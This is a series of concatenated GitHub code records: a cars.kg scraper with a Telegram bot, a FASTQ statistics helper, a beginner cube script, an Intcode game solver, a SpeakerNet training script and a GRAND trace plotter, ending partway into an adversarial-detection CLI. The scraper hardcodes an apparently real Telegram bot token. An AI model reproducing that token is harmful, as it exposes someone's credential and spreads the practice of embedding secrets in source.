Simple Algorithms/Bisection Search.py","file_name":"Bisection Search.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42537811250","text":"from bs4 import BeautifulSoup as bs\nimport requests\nimport csv\n\ncount = 0\n\ndef get_html(url: str) -> str:\n    '''Fetches the HTML code of the given site'''\n    response = requests.get(url)\n    return response.text\n\ndef get_data(html:str) -> list:\n    '''Parser function: extracts all the car data from the site'''\n    soup = bs(html, 'lxml')\n    catalog = soup.find('div', class_ = 'catalog-list')\n    cars = catalog.find_all('a', class_ = 'catalog-list-item')\n    result = []\n    for car in cars:\n        \n        name = car.find('span', class_ = 'catalog-item-caption').text.strip()\n        try:\n            img = car.find('img', class_ = 'catalog-item-cover-img').get('src')\n        except:\n            img = 'No picture'\n        price = car.find('span', class_ = 'catalog-item-price').text\n        year = car.find('span', class_ = 'caption-year').text.strip()\n        mile = car.find('span', class_ = 'catalog-item-mileage').text.strip()\n        desc = car.find('span', class_ = 'catalog-item-descr').text.strip()\n        \n\n        data = {\n            'name': name,\n            'price': price,\n            'year': year,\n            'mile':mile,\n            'desc': desc,\n            'img': img\n        }\n\n        result.append(data)\n\n    return result\n\ndef write_to_csv(data:dict) -> None:\n    '''Writes all the collected data to a CSV file'''\n\n    with open('carsss.csv', 'a') as file:\n        fieldnames = ['#', 'Name', 'Price', 'Year', 'Mile', 'Desc', 'Image']\n        writer = csv.DictWriter(file, fieldnames)\n        global count\n\n        for car in data:\n            count += 1\n            writer.writerow ({\n                '#': count,\n                'Name': car['name'],\n                'Price': car['price'],\n                'Year':car['year'],\n                'Mile': car['mile'],\n                'Desc': car['desc'],\n                'Image':car['img']\n            })\n\ndef prepare_csv() -> None:\n    '''Prepares the CSV file by writing the header row'''\n    with open ('carsss.csv', 'w') as file:\n        fieldnames = ['#', 'Name', 'Price', 'Year', 'Mile', 'Desc', 'Image']\n        writer = csv.DictWriter(file, fieldnames)\n        writer.writerow({\n            '#': '#',\n            'Name': 'Name',\n            'Price': 'Price',\n            'Year': 'Year',\n            'Mile': 'Mile',\n            'Desc': 'Desc',\n            'Image':'Image'\n        })\n\ndef main():\n    i = 1\n    prepare_csv()\n    while True:\n        url = f'https://cars.kg/offers/{i}'\n        html = get_html(url)\n        data = get_data(html)\n        write_to_csv(data)\n        print(f'Parsed page {i}!')\n        if i == 15:\n            break\n        i += 1\n    \n\nmain()\n\n\nimport telebot\nfrom telebot import types\n\ntoken = '5979985933:AAEaf4hhdcX0XL9jo4wgSOeLV4bDkBi8qGc'\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n    with open ('carsss.csv', 'r') as file:\n        bot.send_document(message.chat.id, file)\n\nbot.polling()\n\n\n","repo_name":"manas-d/py26_lections","sub_path":"parsing/parsing_cars/cars_kg.py","file_name":"cars_kg.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13895751108","text":"\"\"\"A simple routine to load in a FASTQ file and give us the distribution of qname lengths, because I was curious\"\"\"\nimport numpy as np\nimport pysam\n\nfrom mitty.benchmarking.alignmentscore import load_qname_sidecar\n\n\ndef main(fastq_fname, qname_overflow_fname, max_expected_qname_length=500):\n  long_qname_table = load_qname_sidecar(qname_overflow_fname)\n  qname_count = [0] * (max_expected_qname_length + 1)\n  with pysam.FastxFile(fastq_fname) as fh:\n    for r in fh:\n      qlen = len(long_qname_table.get(r.name.split('|', 1)[0])) if 
r.name[-1] != '*' else len(r.name)\n qname_count[min(qlen, max_expected_qname_length)] += 1\n\n return qname_count","repo_name":"sbg/Mitty","sub_path":"mitty/empirical/qnamestats.py","file_name":"qnamestats.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"39920653826","text":"# cube of a number\n# get the imput number from user\nn=int(input())\n# define the cube function\ndef cube():\n# cube formula is storen in c\n c=n*n*n\n# return the c value\n return c\n# call the cube function and store it in number\nnumber=cube()\n# print the number as output\nprint(number)\n","repo_name":"dharani277/guvi","sub_path":"codekata/absolute_beginner/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16258418572","text":"import sys\nimport math\nimport itertools\nfrom dataclasses import dataclass\nfrom datetime import datetime\n\ndatetime_start = datetime.now()\n\nDEBUG_LEVEL = 0\n\n@dataclass\nclass Program:\n code: list\n ip: int\n base: int\n memory: dict\n\n def reset(self):\n self.ip = 0\n self.base = 0\n self.memory = {}\n for i in range(len(self.code)):\n self.memory[i] = self.code[i]\n\n def read(self, addr):\n if addr < 0:\n raise Exception(f\"error - attempted to read from {addr}\")\n return self.memory.get(addr, 0)\n\n def write(self, op, param_num, value):\n addr = self.read(self.ip+param_num)\n if op[3-param_num] == \"2\":\n addr = self.base + addr\n if addr < 0:\n raise Exception(f\"error - attempted to write to {addr}\")\n self.memory[addr] = value\n\n def isRunning(self):\n return (not self.isHalted())\n\n def isHalted(self):\n return self.read(self.ip) == 99\n\n def getParam(self,op,param_num):\n p_val = self.read(self.ip+param_num)\n if op[3-param_num] == \"1\": #immediate mode\n return p_val\n elif op[3-param_num] == \"2\": #relative mode\n return self.read(self.base + p_val)\n else:\n return self.read(p_val)\n\n def nextOp(self, input_source, inp=0):\n op = str(self.memory[self.ip]).zfill(5)\n if DEBUG_LEVEL>1: print(f\"\\tOP: {op}\")\n outp = None\n op_i = int(op[3:])\n if op_i == 1: # ADD\n value = self.getParam(op,1) + self.getParam(op,2)\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 2: # MUL\n value = self.getParam(op,1) * self.getParam(op,2)\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 3: # INP\n nextInput = input_source.getNext(inp)\n inp+=1\n if nextInput == None:\n raise Exception(\"Error: no input provided for input operation\")\n self.write(op, 1, nextInput)\n self.ip+=2\n elif op_i == 4: # OUTP\n outp = self.getParam(op,1)\n self.ip+=2\n elif op_i == 5:\n if self.getParam(op,1) != 0:\n self.ip = self.getParam(op,2)\n else:\n self.ip+=3\n elif op_i == 6:\n if self.getParam(op,1) == 0:\n self.ip = self.getParam(op,2)\n else:\n self.ip+=3\n elif op_i == 7:\n value = int(self.getParam(op,1) < self.getParam(op,2))\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 8:\n value = int(self.getParam(op,1) == self.getParam(op,2))\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 9:\n self.base+=self.getParam(op,1)\n self.ip+=2\n else:\n raise Exception(f\"unknown operation {op} at ip {self.ip}\\n\\t{self}\")\n return outp, inp\n\ndef elapsedTimeMs(since=datetime_start):\n return datetime.now()-since\n\ndef processLines(lines):\n code = list(map(int,lines[0].split(\",\")))\n memory = {}\n for addr in range(len(code)):\n 
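# copy the program into the dict-backed sparse memory; read() above falls\n        # back to 0 for any address never written, so memory can grow on demand.\n        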
memory[addr] = code[addr]\n return Program(code,0,0,memory)\n\ndef readFile(filename = sys.argv[1]):\n filename = sys.argv[1]\n lines = []\n with open(filename) as f:\n lines = f.read().splitlines()\n return processLines(lines)\n\n# 0 is an empty tile. No game object appears in this tile.\n# 1 is a wall tile. Walls are indestructible barriers.\n# 2 is a block tile. Blocks can be broken by the ball.\n# 3 is a horizontal paddle tile. The paddle is indestructible.\n# 4 is a ball tile. The ball moves diagonally and bounces off objects.\n\nEMPTY=0\nWALL=1 \nBLOCK=2 #breakable\nPADDLE=3 #horizontal\nBALL=4 # moves diagonally, bounces\n\n@dataclass(unsafe_hash=True)\nclass Point:\n x: int\n y: int\n\n@dataclass\nclass InputSource:\n joystick: int\n def getNext(self, inp):\n return self.joystick\n\nprogram = readFile()\nif DEBUG_LEVEL>1: print(f\"\\t{program.memory}\")\n\ndef runProgram(program,input_source,msg=\"\"):\n print(f\"running with inputs {input_source}\\n{msg}\")\n inp=0\n buffer=[]\n tiles={}\n score=0\n paddle=None\n ball=None\n while program.isRunning():\n if ball and paddle:\n if ball.x == paddle.x:\n input_source.joystick=NEUTRAL\n elif ball.x1: print(f\"\\t{program.memory}\")\n return tiles,score\n\nLEFT=-1\nNEUTRAL=0\nRIGHT=1\n\ntiles,score = runProgram(program, InputSource(NEUTRAL))\nnum_blocks = sum(1 for tile in tiles if tiles[tile]==BLOCK)\nprint(f\"{elapsedTimeMs()} looks like there are {num_blocks} blocks\")\n\nprogram = readFile()\nprogram.code[0] = 2\nprogram.reset()\ntiles,score = runProgram(program, InputSource(NEUTRAL))\nprint(f\"{elapsedTimeMs()} got a score of {score}\")\n","repo_name":"benjm/aoc2019","sub_path":"day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20209291513","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nimport sys, time, os, argparse, socket\nimport numpy\nimport pdb\nimport torch\nimport glob\nfrom tuneThreshold import tuneThresholdfromScore\nfrom SpeakerNet import SpeakerNet\nfrom DatasetLoader import DatasetLoader\nimport subprocess\nimport time\nfrom pathlib import Path\nfrom data_fetch import download_gcs_dataset, extract_gcs_dataset, \\\n transcode_gcs_dataset, set_loc_paths_from_gcs_dataset,\\\n download_blob, upload_blob\nimport yaml\nimport os\nimport pwd\nimport google\n\n# for local runs, use this for unique checkpoint dirs across team members\ndef get_username():\n return pwd.getpwuid( os.getuid() )[ 0 ]\n\n\nparser = argparse.ArgumentParser(description = \"SpeakerNet\");\n\n## New args to support running on kubernetes/kubeflow\n# @note \"tmp\" denotes that this output data will not be captured by\n# the kubeflow pipeline or made available to downstream components\n# set --data-bucket in order to fetch lists and data from GCS before reading\n# them from local filesystem\n\n# temporary/internal outputs\nparser.add_argument('--data-bucket', type=str)\nparser.add_argument('--save-tmp-data-to', type=str, default=\"./tmp/data/\")\nparser.add_argument('--skip-data-fetch', action='store_true')\nparser.add_argument('--force-training-reset', action='store_true')\nparser.add_argument('--save-tmp-model-to', type=str, default=\"./tmp/model/\");\nparser.add_argument('--save-tmp-results-to', type=str, default=\"./tmp/results/\");\nparser.add_argument('--save-tmp-feats-to', type=str, default=\"./tmp/feats/\");\n\nparser.add_argument('--checkpoint-bucket', type=str,\n 
default=\"voxsrc-2020-checkpoints-dev\");\nparser.add_argument('--checkpoint-path', type=str, default=f\"{get_username()}/\");\n\n# permanent/component outputs\nparser.add_argument('--save-model-to', type=str, default=\"./out/model.txt\")\n\n## Data loader\nparser.add_argument('--max_frames', type=int, default=200, help='Input length to the network');\nparser.add_argument('--batch_size', type=int, default=200, help='Batch size');\n# ^^^ use --batch_size=30 for small datasets that can't fill an entire 200 speaker pair/triplet batch\nparser.add_argument('--max_seg_per_spk', type=int, default=100, help='Maximum number of utterances per speaker per epoch');\nparser.add_argument('--nDataLoaderThread', type=int, default=5, help='Number of loader threads');\n\n## Training details\nparser.add_argument('--test_interval', type=int, default=10, help='Test and save every [test_interval] epochs');\nparser.add_argument('--max_epoch', type=int, default=100, help='Maximum number of epochs');\n# ^^^ use --max_epoch=1 for local testing\nparser.add_argument('--trainfunc', type=str, default=\"amsoftmax\", help='Loss function');\nparser.add_argument('--optimizer', type=str, default=\"adam\", help='sgd or adam');\n\n## Learning rates\nparser.add_argument('--lr', type=float, default=0.001, help='Learning rate');\nparser.add_argument(\"--lr_decay\", type=float, default=0.95, help='Learning rate decay every [test_interval] epochs');\n\n## Loss functions\nparser.add_argument(\"--hard_prob\", type=float, default=0.5, help='Hard negative mining probability, otherwise random, only for some loss functions');\nparser.add_argument(\"--hard_rank\", type=int, default=10, help='Hard negative mining rank in the batch, only for some loss functions');\nparser.add_argument('--margin', type=float, default=0.3, help='Loss margin, only for some loss functions');\nparser.add_argument('--scale', type=float, default=30, help='Loss scale, only for some loss functions');\nparser.add_argument('--nSpeakers', type=int, default=5994, help='Number of speakers in the softmax layer for softmax-based losses, utterances per speaker per iteration for other losses');\n\n## Load and save\nparser.add_argument('--initial_model', type=str, default=\"\", help='Initial model weights');\nparser.add_argument('--save_path', type=str, default=\"/tmp/data/exp1\", help='Path for model and logs');\n\n## Training and test data\nparser.add_argument('--train_list', type=str, help='Train list');\nparser.add_argument('--test_list', type=str, help='Evaluation list');\nparser.add_argument('--train_path', type=str, default=\"voxceleb2\", help='Absolute path to the train set');\nparser.add_argument('--test_path', type=str, default=\"voxceleb1\", help='Absolute path to the test set');\n\n## For test only\nparser.add_argument('--eval', dest='eval', action='store_true', help='Eval only')\n\n## Model definition\nparser.add_argument('--model', type=str, default=\"ResNetSE34L\", help='Name of model definition');\nparser.add_argument('--encoder_type', type=str, default=\"SAP\", help='Type of encoder');\nparser.add_argument('--nOut', type=int, default=512, help='Embedding size in the last FC layer');\n\nargs = parser.parse_args();\n\ntrain_list, test_list, train_path, test_path = [None, None, None, None]\n\n## Fetch data from GCS if enabled\nif args.data_bucket is not None and not args.skip_data_fetch:\n print(\"Performing GCS data fetch\")\n # download, extract, transcode (compressed AAC->WAV) dataset\n download_gcs_dataset(args)\n extract_gcs_dataset(args)\n 
transcode_gcs_dataset(args)\n # set new lists and data paths\n train_list, test_list, train_path, test_path \\\n = set_loc_paths_from_gcs_dataset(args)\nelif args.data_bucket is not None and args.skip_data_fetch:\n print(\"Skipping GCS data fetch\")\n # dataset from GCS already available; set new lists and data paths\n train_list, test_list, train_path, test_path \\\n = set_loc_paths_from_gcs_dataset(args)\nelse:\n print(\"Using local, permanent dataset\")\n # pass through to use permanent local dataset\n train_list = args.train_list\n test_list = args.test_list\n train_path = args.train_path\n test_path = args.test_path\n\n# init directories\n# temporary / internal output directories\ntmp_output_dirs = [args.save_tmp_model_to, args.save_tmp_results_to,\n args.save_tmp_feats_to]\n# directories of parmanent / component output artifacts\noutput_dirs = [os.path.dirname(args.save_model_to)]\n\nfor d in (tmp_output_dirs + output_dirs):\n if not(os.path.exists(d)):\n os.makedirs(d)\n\n# set device cuda or cpu\ncuda_avail = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if cuda_avail else \"cpu\")\nprint(f\"Cuda available: {cuda_avail}\")\n\n## Load models\ns = SpeakerNet(device, **vars(args));\n\nit = 1;\nprevloss = float(\"inf\");\nsumloss = 0;\n\n# Load model weights\n\n# Check for training meta data from a previously preempted run\nMETADATA_NAME = 'metadata.yaml'\nmetadata_gcs_src_path = os.path.join(args.checkpoint_path, METADATA_NAME)\nmetadata_file_dst_path = os.path.join(args.save_tmp_model_to, METADATA_NAME)\ndefault_metadata = {'is_done': False}\nmetadata = default_metadata\n\nif args.force_training_reset:\n print(\"Starting at epoch 0, regardless of previous training progress\")\nelse:\n # fetch metadata if available\n try:\n download_blob(args.checkpoint_bucket, metadata_gcs_src_path,\n metadata_file_dst_path)\n print(\"Downloaded previous training metadata\")\n with open(metadata_file_dst_path, 'r') as f:\n try:\n metadata = yaml.safe_load(f)\n print(f\"Loaded previous training metadata: {metadata}\")\n # grab the latest model name (corresponding to the last epoch)\n latest_model_name = metadata['latest_model_name']\n # download the model\n model_gcs_src_path = os.path.join(args.checkpoint_path, latest_model_name)\n model_file_dst_path = os.path.join(args.save_tmp_model_to, latest_model_name)\n try:\n download_blob(args.checkpoint_bucket, model_gcs_src_path,\n model_file_dst_path)\n print(\"**Downloaded a saved model**\")\n # load the saved model's params into the model class\n s.loadParameters(model_file_dst_path);\n print(\"Model %s loaded from previous state!\"%model_file_dst_path);\n it = int(os.path.splitext(os.path.basename(model_file_dst_path))[0][5:]) + 1\n except google.cloud.exceptions.NotFound:\n print(\"**No saved model found**\")\n except yaml.YAMLError as exc:\n print(exc)\n metadata = default_metadata\n except google.cloud.exceptions.NotFound:\n print(\"**No previous training metadata found**\")\n\n # exit if previous training run finished\n if 'is_done' in metadata and metadata['is_done']:\n print(\"Terminating... 
training for this run has already completed\")\n        quit()\n\nif(args.initial_model != \"\"):\n    raise NotImplementedError(\"TODO\")  # raising a plain string is invalid in Python 3\n    s.loadParameters(args.initial_model);\n    print(\"Model %s loaded!\"%args.initial_model);\n\nfor ii in range(0,it-1):\n    if ii % args.test_interval == 0:\n        clr = s.updateLearningRate(args.lr_decay) \n\n## Evaluation code\nif args.eval == True:\n    raise NotImplementedError(\"TODO\")\n    sc, lab = s.evaluateFromListSave(test_list, print_interval=100, feat_dir=args.save_tmp_feats_to, test_path=test_path)\n    result = tuneThresholdfromScore(sc, lab, [1, 0.1]);\n    print('EER %2.4f'%result[1])\n\n    quit();\n\n## Write args to scorefile\nscorefile = open(os.path.join(args.save_tmp_results_to,\"scores.txt\"), \"a+\");\n\nfor items in vars(args):\n    print(items, vars(args)[items]);\n    scorefile.write('%s %s\\n'%(items, vars(args)[items]));\nscorefile.flush()\n\n## Assertion\ngsize_dict = {'proto':args.nSpeakers, 'triplet':2, 'contrastive':2, 'softmax':1, 'amsoftmax':1, 'aamsoftmax':1, 'ge2e':args.nSpeakers, 'angleproto':args.nSpeakers}\n\nassert args.trainfunc in gsize_dict\nassert gsize_dict[args.trainfunc] <= 100\n\n## Initialise data loader\ntrainLoader = DatasetLoader(train_list,\n                            gSize=gsize_dict[args.trainfunc], new_train_path=train_path,\n                            **vars(args));\n\nclr = s.updateLearningRate(1)\n\n# make sure the model output directory exists\nprint(f\"Creating parent dir for path={args.save_tmp_model_to}\")\nPath(args.save_tmp_model_to).parent.mkdir(parents=True, exist_ok=True)\n\nwhile(1):\n    print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), it, \"Training %s with LR %f...\"%(args.model,max(clr)));\n\n    ## Train network\n    loss, traineer = s.train_network(loader=trainLoader);\n\n\n    ## Validate and save\n    if it % args.test_interval == 0:\n        raise NotImplementedError(\"TODO\")\n\n        print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), it, \"Evaluating...\");\n\n        sc, lab = s.evaluateFromListSave(test_list, print_interval=100,\n            feat_dir=args.save_tmp_feats_to, test_path=test_path)\n        result = tuneThresholdfromScore(sc, lab, [1, 0.1]);\n\n        print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), \"LR %f, TEER/T1 %2.2f, TLOSS %f, VEER %2.4f\"%( max(clr), traineer, loss, result[1]));\n        scorefile.write(\"IT %d, LR %f, TEER/T1 %2.2f, TLOSS %f, VEER %2.4f\\n\"%(it, max(clr), traineer, loss, result[1]));\n\n        scorefile.flush()\n\n        clr = s.updateLearningRate(args.lr_decay) \n\n\n        ## touch the output file/dir\n        #Path(args.save_tmp_model_to).parent.mkdir(parents=True, exist_ok=True)\n        #with open(args.save_tmp_model_to, 'w') as eerfile:\n        #    eerfile.write(f\"model iter: {it}\")\n        #    eerfile.write('%.4f'%result[1])\n\n        eerfile = open(args.save_tmp_model_to+\"/model%09d.eer\"%it, 'w')\n        eerfile.write('%.4f'%result[1])\n        eerfile.close()\n        ret = '%.4f'%result[1]\n\n    else:\n\n        print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), \"LR %f, TEER %2.2f, TLOSS %f\"%( max(clr), traineer, loss));\n        scorestuff = \"IT %d, LR %f, TEER %2.2f, TLOSS %f\\n\"%(it, max(clr), traineer, loss)\n        scorefile.write(scorestuff);\n        # write contents\n        with open(args.save_model_to, 'w') as model_save_file:\n            model_save_file.write(f\"[model] ret={scorestuff}\\n\")\n\n        scorefile.flush()\n\n    # save model file for this epoch\n    model_name = \"model%09d.model\"%it\n    model_filename = os.path.join(args.save_tmp_model_to, model_name)\n    s.saveParameters(model_filename);\n    # update metadata\n    metadata['latest_model_name'] = model_name\n    metadata['num_epochs'] = it\n    # dump metadata to yaml file\n    with open(metadata_file_dst_path, 'w') as f:\n        try:\n            yaml.dump(metadata, f)\n            print(\"Saved current training metadata\")\n        except yaml.YAMLError 
as exc:\n print(exc)\n # upload model to GCS\n model_gcs_dst_path = os.path.join(args.checkpoint_path, model_name)\n model_file_src_path = os.path.join(args.save_tmp_model_to, model_name)\n upload_blob(args.checkpoint_bucket, model_gcs_dst_path,\n model_file_src_path)\n # upload metadata to GCS\n metadata_gcs_dst_path = metadata_gcs_src_path\n metadata_file_src_path = metadata_file_dst_path\n upload_blob(args.checkpoint_bucket, metadata_gcs_dst_path,\n metadata_file_src_path)\n\n if it >= args.max_epoch:\n break\n\n it+=1;\n print(\"\");\n\nscorefile.close();\n\n\n# save \"done\" to metadata so it restarts on retry\nmetadata['is_done'] = True\n\n# dump metadata to yaml file\nwith open(metadata_file_dst_path, 'w') as f:\n try:\n yaml.dump(metadata, f)\n print(\"Saved current training metadata\")\n except yaml.YAMLError as exc:\n print(exc)\n\n# upload metadata to GCS\nmetadata_gcs_dst_path = metadata_gcs_src_path\nmetadata_file_src_path = metadata_file_dst_path\nupload_blob(args.checkpoint_bucket, metadata_gcs_dst_path,\n metadata_file_src_path)\n","repo_name":"mmwebster/voxceleb_trainer","sub_path":"trainSpeakerNet.py","file_name":"trainSpeakerNet.py","file_ext":"py","file_size_in_byte":13504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"18942054032","text":"# system\nimport os\nimport time\nimport argparse\n\n# scipy\nimport numpy as np\n\n# matplotlib\nimport matplotlib.pyplot as plt\n\n# grandlib\nimport grand.io.root_trees as rt\n\n\n'''\n\n#######################################\n# PLOTTING TRACES OF GRAND DATA FILES #\n#######################################\n\nGRANDLIB BRANCH: `dev_io_root`\n\nThis script reads out a GRAND data file in ROOT format.\nIt loops over the events in the file, plotting each of the ADC traces\nin an interactive way. 
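Typical usage, with the flags defined in the argparse section below, might\nlook something like:\n\n    python3 plot_traces.py --path /path/to/file.root --sigma 5 --savefig\n\nThe traces are then drawn entry by entry in an interactive figure. 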
This allows us to take a quick look at traces,\nparticularly during on-site analyses.\n\n'''\n\n##############################\n# SET CUSTOM PLOT PARAMETERS #\n##############################\n\nplt.rcParams.update({'axes.labelsize': 30})\nplt.rcParams.update({'xtick.labelsize': 26})\nplt.rcParams.update({'ytick.labelsize': 26})\nplt.rcParams.update({'axes.titlesize': 10})\nplt.rcParams.update({'legend.fontsize': 20})\n\n\n###########################\n# DEFINE PARSER ARGUMENTS #\n###########################\n\nparser = argparse.ArgumentParser(description=\"Plot ADC traces of GRAND events.\")\n\nparser.add_argument('--path',\n dest='path_to_data_file',\n default='/sps/grand/data/gp13/may2023/20dB/ROOTfiles/GRAND.TEST-RAW-10s-ChanXYZ-20dB-14dus.20230520125419.001_dat.root',\n type=str,\n help='Specifies the path of the ROOT data file containing the\\\n traces to plot.')\n\nparser.add_argument('--time_sleep',\n dest='time_sleep',\n default=1,\n type=float,\n help='Specifies the sleep time between plotting traces of each entry.')\n\nparser.add_argument('--start_entry',\n dest='start_entry',\n default=0,\n type=int,\n help='Entry of ROOT tree from where to start the plotting')\n\nparser.add_argument('--sigma',\n dest='sigma',\n default=0,\n type=int,\n help='If sigma>0 plot lines of sigma*std.')\n\nparser.add_argument(\"--savefig\",\n dest=\"savefig\",\n action='store_true',\n help=\"Save plots in `../plots/` directory.\")\nparser.set_defaults(savefig=False)\n\nparse_args = parser.parse_args()\n\npath_to_data_file = parse_args.path_to_data_file\ntime_sleep = parse_args.time_sleep\nstart_entry = parse_args.start_entry\nsigma = parse_args.sigma\nsavefig = parse_args.savefig\n\n\n###################################\n# READ DATA FILE AND OBTAIN TREES #\n###################################\n\nif not os.path.exists(path_to_data_file):\n raise Exception('File not found:',path_to_data_file)\n\ndata_file = path_to_data_file.split('/')[-1]\n\n\n# Initiate TADC tree\ndf = rt.DataFile(path_to_data_file)\ntadc = df.tadc\n#tadc = rt.TADC(path_to_data_file)\n\n\n###################\n# PLOT THE TRACES #\n###################\n\n# Idea is to create figure before loop, and redraw at each iteration\n\n# Activate interactive mode\nplt.ion()\n\n# Create figure\nfig, ax = plt.subplots(3,1,sharex=True,figsize=(10,8))\n\n# Get first TADC entry\ntadc.get_entry(0)\n\n# Depending on how you take data, not all ADC channels are the same.\n# For GP13 data of March: X, Y, Z correspond to channels 1, 2, 3\n# For Nancay data of May: X, Y, Z correspond to channels 0, 1, 2\nchannels = [1,2,3]\nif tadc.trace_ch[0][3] == []: \n channels = [0,1,2]\n\nlabels = ['Channel {:}'.format(channel) for channel in channels]\n\n# Create plt.plot instances\nplt_0, = ax[0].plot(tadc.trace_ch[0][channels[0]],label=labels[0],color='b')\nplt_1, = ax[1].plot(tadc.trace_ch[0][channels[1]],label=labels[1],color='m')\nplt_2, = ax[2].plot(tadc.trace_ch[0][channels[2]],label=labels[2],color='r')\n\n# Create plt.hline instances\nif sigma > 0:\n label = '$\\pm {}\\sigma$'.format(sigma)\n hline_0_plus = ax[0].axhline(color='k',linewidth=2,linestyle='--',label=label)\n hline_1_plus = ax[1].axhline(color='k',linewidth=2,linestyle='--',label=label)\n hline_2_plus = ax[2].axhline(color='k',linewidth=2,linestyle='--',label=label)\n\n hline_0_minus = ax[0].axhline(color='k',linewidth=2,linestyle='--')\n hline_1_minus = ax[1].axhline(color='k',linewidth=2,linestyle='--')\n hline_2_minus = ax[2].axhline(color='k',linewidth=2,linestyle='--')\n\n# Set axis 
labels\nax[2].set_xlabel('Sample number',fontsize=20)\nax[1].set_ylabel('ADC counts [LSB]',fontsize=20)\n\n# Set figure legends\nax[0].legend(frameon=True)\nax[1].legend(frameon=True)\nax[2].legend(frameon=True)\n\nfor entry in range(tadc.get_number_of_entries())[start_entry:]:\n print(entry)\n\n # Load the entry in the tree\n tadc.get_entry(entry)\n\n # Get the traces\n trace_0 = tadc.trace_ch[0][channels[0]]\n trace_1 = tadc.trace_ch[0][channels[1]]\n trace_2 = tadc.trace_ch[0][channels[2]]\n\n # Get the STD of the traces\n std_0 = np.std(trace_0)\n std_1 = np.std(trace_1)\n std_2 = np.std(trace_2)\n\n # Plot the traces in X=NS, Y=EW, Z=UP\n plt_0.set_ydata(trace_0)\n plt_1.set_ydata(trace_1)\n plt_2.set_ydata(trace_2)\n\n if sigma > 0:\n hline_0_plus.set_ydata(sigma*std_0)\n hline_1_plus.set_ydata(sigma*std_1)\n hline_2_plus.set_ydata(sigma*std_2)\n\n hline_0_minus.set_ydata(-sigma*std_0)\n hline_1_minus.set_ydata(-sigma*std_1)\n hline_2_minus.set_ydata(-sigma*std_2)\n\n # Rescale y axes\n # ylim_0 = [np.min(trace_0) - 20, np.max(trace_0) + 20]\n # ylim_1 = [np.min(trace_1) - 20, np.max(trace_1) + 20]\n # ylim_2 = [np.min(trace_2) - 20, np.max(trace_2) + 20]\n\n if sigma < 5.5:\n lim = 7.5\n else:\n lim = sigma + 0.5\n\n ylim_0 = [-lim*std_0, lim*std_0]\n ylim_1 = [-lim*std_1, lim*std_1]\n ylim_2 = [-lim*std_2, lim*std_2]\n\n ax[0].set_ylim(ylim_0)\n ax[1].set_ylim(ylim_1)\n ax[2].set_ylim(ylim_2)\n\n # Set figure title\n title = r'File: {:} | Entry: {:} | Event index: {:} | DU: {:}'\n title = title.format(data_file,entry,tadc.event_id[0],tadc.du_id[0])\n ax[0].set_title(title)\n\n # Draw figure\n fig.canvas.draw()\n\n # Save figure if specified\n if savefig:\n plot_dir = '/pbs/home/p/pcorrea/GRAND/plots/traces/'\n extension = '_entry_{}.png'.format(entry)\n plot_file = data_file.replace('.root',extension)\n plt.savefig(plot_dir+plot_file,bbox_inches='tight',dpi=150)\n print('Saved figure at',plot_dir+plot_file)\n\n # Flush events for next iterations\n fig.canvas.flush_events()\n \n # Sleep for some time to show the figure\n time.sleep(time_sleep)\n\n'''\n#################\n# END OF SCRIPT #\n#################\n'''","repo_name":"pcorcam/grand-data-analysis","sub_path":"plot_traces.py","file_name":"plot_traces.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74568907768","text":"## @package AdversarialDetection\r\n# \r\nimport sys\r\nimport os\r\nimport argparse\r\nimport numpy as np\r\nimport torch\r\nimport csv\r\nfrom torchvision import utils\r\nfrom Model.CNN import CNN\r\nfrom Model.Reconstructor import Reconstructor\r\nfrom Model.Detector import Detector\r\nfrom Model.Adversary import Adversary\r\nfrom Model.MetaCNN import MetaCNN\r\n\r\nfrom Utility.Data import Data\r\nfrom Utility.ProgressBar import ProgressBar\r\n\r\n##\r\n# @brief\r\n# Application Entry\r\n#\r\n# @details\r\n# @par\r\n# This method is the application entry point.\r\ndef Main( ):\r\n print( \"Parsing Arguments\" )\r\n parser = argparse.ArgumentParser( description = \"CPSC-597\" )\r\n parser.add_argument( '--dataset', type = str, default = 'mnist', choices = [ 'mnist', 'cifar10' ] )\r\n parser.add_argument( '--data_path', type = str, required = True, help = 'Path to dataset' )\r\n parser.add_argument( '--batch_size', type = int, default = 64, help = 'Size of a batch' )\r\n parser.add_argument( '--mode', type = str, default = 'cnn', choices = [ 'cnn', 'recon', 'detect', 'test', 'adversary' ] )\r\n 
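# Each mode maps to a branch in Main below: 'cnn' trains the classifier,\r\n    # 'recon' the reconstructor and 'detect' the detector (on PGD adversarial\r\n    # examples); 'test' evaluates the meta model, 'adversary' saves examples.\r\n    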
